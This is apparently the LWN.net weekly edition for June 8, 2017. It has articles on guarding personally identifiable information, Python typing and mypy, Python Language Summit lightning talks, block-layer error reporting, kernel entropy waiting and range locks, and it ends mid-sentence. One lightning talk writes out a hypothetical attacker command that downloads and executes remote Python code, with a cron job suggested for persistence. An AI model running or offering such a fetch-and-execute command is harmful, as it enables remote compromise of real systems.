|
|
Subscribe / Log in / New account

LWN.net Weekly Edition for June 8, 2017

Welcome to the LWN.net Weekly Edition for June 8, 2017

This edition contains the following feature content:

This week's edition also includes these inner pages:

  • Brief items: Brief news items from throughout the community.
  • Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Comments (6 posted)

Guarding personally identifiable information

June 7, 2017

This article was contributed by Andy Oram

There is no viable way to prevent data from being collected about us in the current age of computing. But if institutions insist on knowing our financial status, purchasing habits, health information, political preferences, and so on, they have a responsibility to keep this data—known as personally identifiable information (PII)—from leaking to unauthorized recipients. At the 2017 Strata data conference in London, Steve Touw presented a session on privacy-enhancing technologies. In a fast-paced 40 minutes he covered the EU regulations about privacy, the most popular technical measures used to protect PII, and some pointed opinions about what works and what should be thrown into the dustbin.

To jump straight to Touw's conclusions: we need to maintain much tighter control over data that we share. Like most who have studied the question of PII, Touw finds flaws in current forms of de-identification, which is the technique we rely on most often for protecting PII. He suggests combining de-identification techniques with a combination of restrictions on the frequency and types of queries executed against data sets, along with a context-based approach to data protection that is much more sophisticated than current access controls.

No one would have enough time to explain thoroughly all the issues in protecting PII. Touw focused on European legal requirements (which made sense for a conference held in London), technical difficulties in de-identifying data, and good organizational practices for protecting privacy. This article fills out some of the background underlying these issues as well.

Common constraints on data collection

Although people viscerally fear the collection of personal data, and alternatives such as Vendor Relationship Management have been suggested for leaving control over data in the hands of the individual, there are few barriers in the way of organizations that collect this data. The EU has regulated data collection for decades, and its General Data Protection Regulation (GDPR), which is supposed to come into force on May 25, 2018, requires limitations that are familiar to those in the privacy field. These include minimization, data retention limits, and restrictions on use to the original purpose for collecting the data. I'll offer a brief overview of these key concepts.

Minimization means collecting as little data as you can to meet your purpose. If you need to know whether someone is old enough to drive, you can record that as a binary field without recording the person's age. If you need to know how many cars pass down a street each day in order to plan traffic flow, you don't need to record the license plates of the cars.

Data retention limits are a form of minimization. Most data's value diminishes greatly after a few months. For instance, a person's income may change, so income information collected a year ago may no longer be useful for marketing. Therefore, without much of a sacrifice in accuracy, an organization can protect privacy by discarding data after a certain time interval.

Restricting use to the original purpose of data collection is an even stricter criterion. Supposedly it would mean that a retailer who collects your information in order to charge your credit card should not use that information to improve its marketing campaigns.

Governments in the US impose restrictions only on specific classes of information, such as data collected by health care providers. Fair Information Practices, which cover some broad issues such as transparency and the right to correct errors, are widely praised but not required by law. They also go nowhere near as far as EU laws in granting rights to individuals for their data.

Although the GDPR does not require organizations to obtain consent for data collection, Touw advised them always to do so. Otherwise, the organizations may be asked to demonstrate in court that they had a "legitimate interest" in the data, which is a subjective judgment. Touw did not go into the problems of consent forms, so his advice was really aimed at protecting the company doing the collection, not the individuals.

The dilemma of data sharing

Protection of personal data takes place on two levels: while storing it at the site collecting the data, and while granting access to other parties. Why would sites offer data to other parties? Touw did not cover this question, but there are a few reasons behind that practice.

Organizations can realize a large income stream from selling the data, which can then be used for purposes ranging from benign to ill. Governments collect and share data that is supposed to be for the public benefit (e.g. race and gender, incidences of communicable diseases). Public agencies, and even some companies, believe their data could contribute to initiatives in health, anti-corruption efforts, and other areas. Some institutions also anticipate that they might benefit from tools developed by others. Thus, Netflix released data on who viewed its video content for the Netflix prize of 2009, hoping to get a better algorithm for video recommendations from experts in the field.

When data is shared publicly, the organization tries to strip direct identifiers, such as names and social security numbers, and tries to reduce the risk that indirect identifiers such as postal codes can be used to re-identify individuals. Even when organizations sell their data privately, they often try to de-identify it in similar ways. The GDPR gives organizations pretty much free rein to use and release data, so long as it is correctly de-identified.

Problems with de-identification

The bulk of Touw's talk was devoted to the risks of de-identification, also known as anonymization. His skepticism about de-identification is shared by most experts in computing who have examined the field. In particular, he looked at techniques for pseudonymity and K-anonymity, claiming that they can't prevent re-identification unless they're pursued so far that they render the output data useless.

Touw predicted that organizations will stop releasing free, de-identified data sets, because de-identification has too often proven insufficient and too many embarrassing breaches have been publicized. Besides the Netflix prize mentioned earlier, where researchers re-identified Netflix users from the data [PDF], Touw mentioned some other open data sets and spent a good deal of time on New York City taxi data.

All these re-identification attacks depended on the mosaic effect, or finding other publicly available sources and joining them with the released data set. (Touw called this a "link attack.") In the case of the New York taxi data, most of us would have nothing to fear, but celebrities who are sighted at the beginning or end of their rides could potentially be re-identified. Touw claimed that New York City could not have prevented the re-identification by fuzzing or removing fields from the data, a point also made by the researcher who originally performed the re-identification attack. I believe Touw moved the goalposts a bit by adding new sources of information to fuel possible attacks as he removed existing information. Still, he made a case that the only way to protect celebrities would be to remove everything of value from the data.

Pseudonymization is the easiest way to de-identify data. It consists of putting a meaningless value in place of a personally identifying field. People may still be re-identified, though, if they possess unique values for other fields. For instance, if someone is the only Hispanic person in a particular apartment building, a combination of race and address can identify them. If someone suffers from a rare disease, a hospital listing with diagnoses may reveal sensitive information to someone who knows they have that disease.

K-anonymity addresses the problem of unique values, known also as high cardinality values. The technique makes sure there are enough duplicate values in different rows of data so that no individual is identified by a particular combination of fields. K-anonymity works by making values in fields more general: a common example is offering just the first three digits of a five-digit ZIP code. Because the digits are hierarchical (the code 200 is a single contiguous geographic area that contains 20001, 20002, etc.), generalizing the ZIP code exposes data that is still useful but is less specific.

Touw briefly mentioned two enhancements to K-anonymity, known as L-diversity and T-closeness, that are more restrictive. L-diversity [PDF] restricts the number of unique values in information by taking into account the probability that an attacker can guess something about the target (such as their address). T-closeness [PDF] tries to prevent re-identification by making sure that each division in the data (such as ZIP code) contains sensitive values with about the same frequency as the general population. Touw claimed L-diversity and T-closeness are more trouble than they're worth, and that all these techniques leave people at risk of re-identification unless the data is generalized to the point where it's worthless.

When you listen to data scientists like Touw who have investigated the limitations of anonymization, you come away feeling that there's no point to doing it. But let's step back and consider whether this is a constructive conclusion. Nearly all published examples of re-identification took advantage of poor de-identification techniques. Done right, according to proponents, de-identification is still safe. On the other hand, it's easy for proponents of de-identification to say that a technique was flawed after the fact.

To resolve the dilemma, one can look at de-identification like encryption. We can be fairly certain that, within a few decades, increased computing power and new algorithms will allow attackers to break our encryption. We keep increasing key sizes over the decades to compensate for this certainty. And yet we keep using encryption, because nothing better exists. De-identification is still worth using too. But Touw has some alternative ways to carry it out.

Proposed remedies

In addition to advising that organizations obtain consent for data collection, Touw offered two practices that are more effective than the previous methods of data protection: restricting data requests to a safe set of queries and using context-based restrictions. Neither practice is in common use now, but models exist for their use.

If an organization does not release data in the open, it can achieve some of the organizational and social benefits of open data by offering a limited set of queries to third parties. Touw promoted the concept of differential privacy, which is a complex technology understood by relatively few data experts. The concept has been attributed [PDF] to Cynthia Dwork, who co-authored a key paper [PDF] laying out the theory. She explains differential privacy there (on page 6) by saying, "it ensures that any sequence of outputs (responses to queries) is 'essentially' equally likely to occur, independent of the presence or absence of any individual." It never reveals any specific fields in the underlying data, but provides a set of aggregate queries—such as sums or averages—that mathematical analysis of the data set have shown to be privacy-preserving.

Touw demonstrated how a specific value for a specific person might be obtained by asking the same question—or to disguise the attack, many questions that differ slightly—over and over. Each question produces a slightly different result in the field you're interested in, but if you take the average of these results you can get very close to the original value. So some form of rate-limiting must be imposed on queries.

Touw's other major recommendation involves context-based or purpose-based restrictions, which he called "the future of privacy controls". They go far beyond individual or group access controls used by most sites.

One example of context-based restrictions is time-based access. A conventional employer might allow access by its employees from 9:00 AM to 5:00 PM. In a more flexible environment, such as a hospital where nurses' shifts have irregular beginnings and ends, the hospital may allow each nurse access to data when their schedule indicates they are on duty.

Another type of context-based restriction is based on granting users limited access to data based on a license that spells out what they want to do (say, cancer research) and how they can use data. If the user starts issuing requests for certain combinations of rows or columns that don't seem to fulfill the basis for which the license was granted, access can be denied.

Touw advises organizations not to try to combine all their data in a single data lake—or worse still, to copy data into a new repository in order to perform access controls. Maintaining two copies of data is always cumbersome and error-prone. In addition, you now offer attackers twice the opportunities to break into the data. Instead, he suggests an organizational set up what he calls a "data control plane". It implements all the policies defined by the organization and covers all data stores. The control plane should expose easy ways to create rules, make sure new policies take effect immediately, recognize the types of context mentioned earlier, and maintain audits that show what the data was used for. Organizations must also exercise governance over data so they know who owns it, who has access to it and under what circumstances, and how to manage the data's lifecycle (acquiring, storing, selling, purging). They can't just rely on the IT department to define and implement policies.

Few if any commercial vendors offer the advanced privacy-protecting technologies recommended by Touw. So at this point, attackers run ahead of most organizations that maintain data on us. Still, Touw's talk opens up a valuable debate about what real privacy protection looks like in 2017.

Comments (45 posted)

Classes and types in the Python typing module

By Jake Edge
June 7, 2017

Python Language Summit

Mark Shannon is concerned that the Python core developers may be replaying a mistake: treating two distinct things as being the same. Treating byte strings and Unicode text-strings interchangeably is part of what led to Python 3, so he would rather not see that happen again with types and classes. The Python typing module, which is meant to support type hints, currently implements types as classes. That leads to several kinds of problems, as Shannon described in his session at the 2017 Python Language Summit.

[Mark Shannon]

He wanted to convince people that the typing module is "heading in the wrong direction". He is not opposed to type hints or variable annotations, but is concerned that the typing module is conflating types and classes in a way that is detrimental. Classes are for object-oriented programming, while types declare what something is. A class can be a subclass of another without being a subtype of it. List[int] and List[float] (lists of integers and floating point numbers, respectively) are distinct types, he said, but are both implemented by the list class. In the current typing module, types are implemented as classes.

This has happened before, with bytes and Unicode in the Python 2 days, Shannon said. He would rather see this get addressed now, before the core developers (and the language) get to that point again.

Practical problems

Using classes for types has some concrete negative effects. Classes are "large and bad" in CPython, but are much worse for MicroPython. A namedtuple-based implementation of List[int] is around 1/60 the size of the class-based one.

There are also some oddities. He showed two class definitions:

    class MyList(Sequence[int], list): pass

    class MyList(list, Sequence[int]): pass
In both cases, MyList inherits from builtins.list and the sequence of integers type (Sequence[int]), but a simple append operation on an instance of one of them is 10% faster than on an instance of the other.

It turns out that the method resolution order (MRO) comes into play. MRO determines which method actually gets called when multiple inheritance is used; Python tracks that on the __mro__ attribute. For a class that inherits builtins.list, the MRO has three items, but for List[int] it has 17.

Types and type constructors are already hard enough to understand, he said. Turning them into classes and metaclasses just makes that worse. In addition, since types in typing already have a custom metaclass, it makes it difficult to define a type for a class that has its own custom metaclass.

When adopting type hints, the core developers made a few promises, Shannon said. Type hints would allow programs to be checked for type errors, they would always be optional, and using them should not slow your program down. The first two of those have been kept, but the last has not. Every time you run a program with type hints, it pulls in large chunk of code that slows things down.

Options

He presented three options. The first was to continue using types as classes, but to painfully check that an instance of Iterable(int) actually produces integers for each entry. Then hope that things don't get as bad as they did for bytes and Unicode. Another was "the status quo"; much the same as the first, but to ignore the checks that seem expensive. The option that he prefers is to keep types and classes distinct, which will remove the "conceptual muddle" and reduce the run-time overhead of using types. He has a minimal prototype implementation on GitHub to demonstrate what he means.

Attendees were generally supportive of his ideas; Guido van Rossum filed a bug for typing on some of the issues he raised. There were also suggestions on ways to reduce the overhead for code that uses type hints. Łukasz Langa noted that Instagram had reduced the size of compiled Python (i.e. bytecode) by 1.5% just by removing the docstrings; perhaps something similar could be done to remove the type annotations to reduce the size of the code.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

Status of mypy and type checking

By Jake Edge
June 7, 2017

Python Language Summit

In his 2017 Python Language Summit session, Jukka Lehtosalo updated attendees on the status of type checking for the language, in general, and for the mypy static type checker. There are new features in the typing module and in mypy, as well as work in progress and planned features for both. For a feature, type hints, that is really only around three years old, there has been a lot of progress made—but, of course, there is still more to come.

The most significant new thing for types in Python is the adoption of PEP 526, which adds a way to annotate variables with their types. As of Python 3.6, variable annotations can be used for regular variables, instance variables, and class variables. The latter is made possible with the ClassVar[] annotation that has been added to typing. Other additions include NewType() for creating distinct types and NoReturn for functions that do not return.

Some recent mypy features include function overloads in source files (and not just stub files) and basic metaclass support, but there is still work to be done on the latter. There is also a new "quick mode" that is up to ten times faster. Quick mode is an incremental check; it just looks at the file itself and assumes that what it imports does not need to be checked.

There are also some experimental mypy features that Lehtosalo mentioned. The mypy_extensions module contains various extensions to typing that are being tried out. Some of those may get promoted to typing if they work out. One of those is the more flexible Callable[] type, which has a syntax that is "not pretty" but works. More information about these and other features can be found in his mypy 0.510 release announcement.

There are also some features in progress for mypy, he said. The TypedDict type, which will allow dictionaries that specify the types of values for specific keys, is one. Another is support for structural subtyping using Protocols. There are some planned improvements for type variables, including adding support for variadic type variables and for variables that describe function argument specifications. Decorators sometimes change a function's signature, so support for declaring the decorated type of a function is planned as well.

Mypy is starting to be used in production. At Dropbox, where Lehtosalo works, 700,000 lines of code have been annotated and are being checked with mypy. The Zulip project has 95,000 lines of code annotated; Facebook, Quora, and others are using the tool as well. There has been quite a bit of positive user feedback, he said. Performance is still an issue, however; a full run at Dropbox takes around two minutes, which is "barely acceptable". But a large scale roll-out at Dropbox is under way.

There were some lessons learned along the way. To start with, changing type systems is "very expensive" and causes a fair amount of pain for users. That means Dropbox may become stuck with some early choices it made before some features had been added to typing and mypy. Having the typing module in the standard library has turned out to be annoying, because there are new features in the 3.6 release that can't be used in 3.5, which is the version used by Dropbox. typing is moving fast, so sometimes it makes sense to backport features into earlier versions, he said.

There are a lot of contributors to the projects (both typing and mypy), especially for typeshed, which collects annotations for Python built-ins and the standard library. The two other major type checkers, pytype and PyCharm, also contribute, so there is a real community building up around type annotations.

Mark Shannon asked when the project would decide to stop adding features for ever-more-obscure type constructs; "at what point do you say 'just use Any'?" Lehtosalo said that the project tends to consider constructs that have multiple users and uses throughout the ecosystem and is not interested in adding support for lots of one-off corner cases.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

Language summit lightning talks

By Jake Edge
June 7, 2017

Python Language Summit

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

[Mark Shannon & micro:bit]

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library. In fact, it has asyncio support, for example. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said, it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not need to be random, necessarily, though that would be fine, it just needs to change the order enough so that reliance on ordering would be picked up in testing.

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, would there be a need for an UnorderedDict, an attendee asked. Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.

Python as a security vulnerability

[Steve Dower]

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

    python -c "exec(urlopen(...).read())"
Adding it as a cron job would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.

PyCharm update

[Dmitry Trofimov & Andrey Vlasovskikh]

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf (documentation here). It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (13 posted)

Improved block-layer error handling

By Jonathan Corbet
June 2, 2017
The kernel's filesystem and block layers are places where a lot of things can go wrong, often with unpleasant consequences. To make things worse, when things do go wrong, informing user space about the problem can be difficult as a consequence of how block I/O works. That can result in user-space applications being unaware of trouble at the I/O level, leading to lost data and enraged users. There are now two separate (and complementary) proposals under discussion that aim to improve how error reporting is handled in the block layer.

Block-layer error codes

One problem with existing reporting mechanisms is that they are based on standard Unix error codes, but those codes were never designed to handle the wide variety of things that can go wrong with block I/O. As a result, almost any type of error ends up being reported back to the higher levels of the block layer (and user space) as EIO (I/O error) with no further detail available. That makes it hard to determine, at both the filesystem and user-space levels, what the correct response to the error should be.

Christoph Hellwig is working to change that situation by adding a dedicated set of error codes to be used within the block layer. This patch set adds a new blk_status_t type to describe block-level errors. The specific error codes added thus far correspond mostly to the existing Unix codes. So BLK_STS_TIMEOUT, indicating an operation timeout, maps to ETIMEDOUT, while BLK_STS_NEXUS, describing a problem connecting to a remote storage device, becomes EBADE ("invalid exchange"). There is, according to Hellwig, "some low hanging fruit" that can be improved by additional error codes, but those codes are not added as part of this patch set.

The new errors can be generated at the lowest levels of the kernel's block drivers, and will be propagated to the point that filesystem code sees them in the results of its block I/O requests. To get there, the bi_error field in struct bio, which contained a Unix error code, has been renamed to bi_status. In-tree filesystems have been changed to use the new field, but they do not yet act on the additional information that may be available there.

This is, in other words, relatively early infrastructural work that makes it possible for the block layer to produce better error information. Actually making use of that infrastructure will have to wait until this work is accepted and headed toward the mainline.

Reporting writeback errors

One particular challenge for block I/O error reporting is that many I/O requests are not the direct result of a user-space operation. Most file data is buffered through the kernel's page cache, and there can be a significant delay between when an application writes data into the cache and when a writeback operation flushes that data to persistent storage. If something goes wrong during writeback, it can be hard to report that error back to user space since the operation that caused that writeback in the first place will have long since completed. The kernel makes an attempt to save the error and report it on a subsequent system call, but it is easy for that information to be lost with the result that the application is unaware that it has lost data.

Jeff Layton's writeback-error reporting patches are an attempt to improve this situation. He adds a mechanism that is based on the idea that applications that care about their data will occasionally call fsync() to ensure that said data has made it to persistent storage. Current kernels might report a writeback error on an fsync() call, but there are a number of ways in which that can fail to happen. With the new mechanism in place, any application that holds an open file descriptor will reliably get an error return on the first fsync() call that is made after a writeback error occurs.

To get there, the patch set creates a new type (errseq_t) for the reporting of writeback errors. It is a 32-bit value with two separate fields: an error code (of the standard Unix variety) and a sequence counter. That counter tracks the number of times that an error has been reported in that particular errseq_t value; kernel code can remember the counter value of the last error reported to user space. If the counter increases on a future check, a new error has been encountered.

The errseq_t variables are added to the address_space structure, which controls the mapping between pages in the page cache and those in persistent storage. The writeback process uses this structure to determine where dirty pages should be written to, so it is a logical place to store error information. Meanwhile, any open file descriptor referring to a given file will include a pointer to that address_space structure, so this errseq_t value is visible (within the kernel) to all processes accessing the file. Each open file (tracked by struct file) gains a new f_wb_err field to remember the sequence number of the last reported error.

Storing that value in the file structure has an important benefit: it makes it possible to report a writeback error exactly once to every process that calls fsync() on that file, regardless of when they make that call. In current kernels, only the first caller after an error occurs has a chance of seeing that error information. It would arguably be better to report the error only to the process that actually wrote the data that experienced the error, but tracking things at that level would be cumbersome and slow. By informing all processes, this mechanism ensures that the right process will get the news.

The final step is to get the low-level filesystem code to use the new reporting mechanism when something goes wrong. Rather than convert all filesystems at once, Layton chose to add a new filesystem-type flag (FS_WB_ERRSEQ) that can be set for filesystems that understand the new scheme. Code at the virtual filesystem layer can then react accordingly depending on whether the filesystem has been converted or not. The intent is to remove this flag and the associated mechanism once all in-tree filesystems have made the change.

The ideas behind this patch set were discussed at the 2017 Linux Storage, Filesystem, and Memory-Management Summit in March; the patches themselves have been through five public revisions since then. There is a reasonable chance that they are approaching a sort of final state where they can be considered for merging in an upcoming development cycle. The result will not be perfect writeback error reporting, but it should be significantly better than what the kernel offers now.

Comments (39 posted)

Waiting for entropy

By Jonathan Corbet
June 6, 2017
Many bytes have been expended over the years discussing the virtues of the kernel's random number generation subsystem. One of the biggest recurring concerns has to do with systems that are unable to obtain sufficient entropy during the boot process to meet early demands for random data. The latest discussion on this topic got off to a bit of a rough start, but it may lead to an incremental improvement in this area.

Jason Donenfeld started the thread with a complaint that /dev/urandom will, when read from user space, return data even if the kernel's internal entropy pool has not yet been properly seeded. In such a case, it is theoretically possible for an attacker to predict the not-so-random data that will be returned. He asserted that /dev/urandom should simply block until the entropy pool is ready, and dismissed the reasoning behind the current behavior: "Yes, yes, you have arguments for why you're keeping this pathological, but you're still wrong, and this api is still a bug."

Bug or not, as Ted Ts'o pointed out, making /dev/urandom block causes distributions like Ubuntu and OpenWrt to fail to boot. That sort of behavioral change is typically called a "regression", and regressions of this sort are not normally allowed. So /dev/urandom will retain its current behavior. But that isn't the point Donenfeld was really trying to address anyway. The real issue, as it turns out, has to do with getting random data from within the kernel instead of from user space. That can be done with a call to:

    void get_random_bytes(void *buf, int nbytes);

This function will place nbytes of random data into the buffer pointed to by buf; it will do so regardless of whether the entropy pool is fully initialized. So, once again, it is possible to get data that is not truly random. Since this function is called from inside the kernel, those calls can happen early in the boot process, so the chance of encountering an insufficiently random entropy pool are relatively high.

This problem is not unknown to the kernel development community, of course. In 2015, Stephan Mueller proposed the addition of a version of get_random_bytes() that would block until the entropy pool is ready, should that be necessary. That idea ran into trouble, though, when Herbert Xu pointed out that it could lead to deadlocks — just the sort of random event that tends not to be of interest. So, instead, a callback interface was created. Kernel code that wants to ensure that it gets good random data starts by creating a callback function and placing a pointer to that function in a random_ready_callback structure:

    struct random_ready_callback {
	struct list_head list;
	void (*func)(struct random_ready_callback *rdy);
	struct module *owner;
    };

That structure is then passed to add_random_ready_callback():

    int add_random_ready_callback(struct random_ready_callback *rdy);

When the random-number subsystem is ready, the given callback function will be called. By adding some more structure (most likely using a completion), the calling code can create something that looks like a synchronous function to get random data.

As Donenfeld pointed out, this interface is a little bit on the cumbersome side, which may have something to do with the fact that it has exactly one call site in the kernel. He suggested that it might make sense to add a synchronous interface that could be used in at least some situations; that would make it possible to fix some places in the kernel that are at risk of using nonrandom data. Ts'o agreed that this approach might make sense:

Or maybe we can then help figure out what percentage of the callsites can be fixed with a synchronous interface, and fix some number of them just to demonstrate that the synchronous interface does work well.

The end result was a patch series from Donenfeld adding a new function:

    int wait_for_random_bytes(bool is_interruptable, unsigned long timeout);

As its name might suggest, wait_for_random_bytes() will wait until random data is available. If is_interruptable is set, the function will return early (with an error code) should the calling process receive a signal. The timeout parameter can be used to put an upper bound on how long the call will wait. This functionality turned out to be a bit more than was needed, though; in particular, Ts'o expressed skepticism about the timeout idea, asking: "If you are using get_random_bytes() for security reasons, does the security reason go away after 15 seconds?" The third version of the patch set removed all of the arguments to wait_for_random_bytes(), making all waits interruptible with no timeout.

The patch series then adds a set of convenience functions to combine waiting and actually getting the random data, including:

    static inline int get_random_bytes_wait(void *buf, int nbytes);

Most of the comments on the patch set at this point are about relatively minor issues. So chances are that some version of this patch set will find its way into the kernel eventually, with the result, hopefully, that there will be a reduced chance of kernel code using insufficiently random data. But there is one other aspect of this situation that seems entirely deterministic: the arguments about the quality of the kernel's random-number subsystem are far from finished. That is, after all, the fundamental problem with random numbers: it is difficult to be sure that they are truly random.

Comments (39 posted)

Range reader/writer locks for the kernel

By Jonathan Corbet
June 5, 2017
The kernel uses a variety of lock types internally, but they all share one feature in common: they are a simple either/or proposition. When a lock is obtained for a resource, the entire resource is locked, even if exclusive access is only needed to a part of that resource. Many resources managed by the kernel are complex entities for which it may make sense to only lock a smaller part; files (consisting of a range of bytes) or a process's address space are examples of this type of resource. For years, kernel developers have talked about adding "range locks" — locks that would only apply to a portion of a given resource — as a way of increasing concurrency. Work has progressed in that area, and range locks may soon be added to the kernel's locking toolkit.

Jan Kara posted a range-locking mechanism in 2013, but that work stalled and never made it into the mainline. More recently, Davidlohr Bueso has picked up that work and extended it. The result is a new form of reader/writer lock — a lock, in other words, that distinguishes between read-only and write access to a resource. Reader/writer locks can increase concurrency in settings where the protected resource is normally accessed by readers, since all readers can run simultaneously. Whenever a writer comes along, though, it must have exclusive access to the resource. Balancing access between readers and writers can be a tricky business where the wrong decisions can lead to starvation, unfairness, or poor concurrency.

Since range locks only cover part of a resource, there can be many of them covering separate parts of the resource as a whole. The data structure that describes all of the known range locks, including those that are waiting for the needed range to become available, for a given resource is a "range lock tree", represented by struct range_lock_tree. This "tree" is the lock that protects the resource as a whole; it will be typically located in or near the relevant data structure where one would otherwise find a simpler lock. Thus, a range-locking implementation will tend to start with something like:

    #include <linux/range_lock.h>

    DEFINE_RANGE_LOCK_TREE(my_tree);

Given the range_lock_tree structure to protect the resource, a thread needing access to a portion of that resource will need to acquire a lock on the range of interest. A lock on a specific range (whether granted or not) is represented by struct range_lock. It is possible to declare and initialize a range lock statically with either of:

